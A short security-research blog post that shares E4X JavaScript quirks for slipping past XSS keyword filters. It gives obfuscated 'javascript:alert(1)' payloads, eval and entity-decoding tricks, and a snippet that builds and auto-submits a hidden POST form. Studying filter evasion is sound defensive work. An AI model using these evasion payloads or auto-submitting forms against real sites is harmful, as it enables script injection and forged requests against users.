Published 17 years 9 months ago • Last updated April 11, 2025 • ⏱️ 2 min read
If you've not been following my sla.ckers thread on unusual javascript then your missing out. My idea was to gather interesting, weird and wonderful javascript tricks which are useful for filter evasion and coding. I investigated E4X quite a lot for this purpose and found a few cool things that I'll share with you.
Lets say a filter disallows certain words, because the {} allows you to execute a javascript block; if you execute a block that returns a blank string then you can use it for keyword evasion. The new array constructor creates a blank array but when used in concatenation it results in a blank string.
location=<text>javascr{new Array}ipt:aler{new Array}t(1)</text>
Another example:-
location=<text>javascr{[]}ipt:aler{[]}t(1)</text>
A few more:-
<>{new String}</>; <>{''}</>; <>{new RegExp()[-1]}</>; <>{<></>}</>;
E4X also has some javascript syntax quirks that normally would cause a parsing error but it's perfectly valid.
default xml namespace = alert(1)
Some more weird looking stuff:-
<>{eval(/alert(1)/[-1])}</>..@*::xyz
(!1..@*::abc?alert:1..@*::xyz)(1)
For some reason numbers can be used as XML
1..@Numbers/(are=1)%1..*::xml
Giorgio brought this to my attention when he was hacking my unsuccessful Firefox sandbox experiment. You can use html entities and they will be decoded when using the XML data as strings.
alert(<>"</>)
A more interesting example with decimal entities:-
eval(<>alert(1)</>+[])
Hackvertor supports morphs which allow you to generate this sort of data automatically, useful for fuzzing XSS filters:- E4X morph
Making forms with E4X is lovely, check it out:-
f=<form/>; f.@id='x'; f.@action='url.php'; f.@method='post'; f.input.@name='h' f.input.@value=1; document.body.innerHTML=f; document.getElementById('x').submit();